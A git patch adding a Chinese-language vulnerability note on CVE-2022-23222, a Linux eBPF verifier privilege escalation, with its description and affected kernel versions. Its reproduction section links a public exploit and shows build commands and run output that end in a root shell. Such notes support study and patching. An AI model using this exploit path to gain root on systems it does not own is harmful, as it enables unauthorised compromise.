From 118f271038b2af074d186f43a9afb5524967234a Mon Sep 17 00:00:00 2001 From: Threekiii <472361400@qq.com> Date: Thu, 23 Jun 2022 09:19:29 +0800 Subject: [PATCH] =?UTF-8?q?=E6=93=8D=E4=BD=9C=E7=B3=BB=E7=BB=9F=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E/Linux=20eBPF=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=20CVE-2022-23222.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Linux eBPF权限提升漏洞 CVE-2022-23222.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md diff --git a/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md b/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md new file mode 100644 index 0000000..3e6366f --- /dev/null +++ b/操作系统漏洞/Linux eBPF权限提升漏洞 CVE-2022-23222.md @@ -0,0 +1,42 @@ +# Linux eBPF权限提升漏洞 CVE-2022-23222 + +## 漏洞描述 + +Linux Kernel 是美国 Linux 基金会发布的开源操作系统 Linux 所使用的内核。Linux 内核是一种开源的类Unix 操作系统宏内核。整个 Linux 操作系统家族基于该内核部署在传统计算机平台(如个人计算机和服务器)。该漏洞是由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 + +## 漏洞影响 + +``` +Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复) +``` + +## 漏洞复现 + +Exp:https://github.com/tr3ee/CVE-2022-23222 + +``` +$ make +cc -I include -static -w -o exploit exploit.c +$ ./exploit +[*] phase(1/8) 'create bpf map(s)' running +[+] phase(1/8) 'create bpf map(s)' done +[*] phase(2/8) 'do some leak' running +[+] phase(2/8) 'do some leak' done +[*] phase(3/8) 'prepare arbitrary rw' running +[+] phase(3/8) 'prepare arbitrary rw' done +[*] phase(4/8) 'spawn processes' running +[+] phase(4/8) 'spawn processes' done +[*] phase(5/8) 'find cred (slow)' running +[+] phase(5/8) 'find cred (slow)' done +[*] phase(6/8) 'overwrite cred' running +[+] phase(6/8) 'overwrite cred' done +[*] phase(7/8) 'spawn root shell' running +[+] Enjoy root! +# id +uid=0(root) gid=0(root) groups=65534(nobody) +# exit +[+] phase(7/8) 'spawn root shell' done +[*] phase(8/8) 'clean up the mess' running +[+] phase(8/8) 'clean up the mess' done +``` +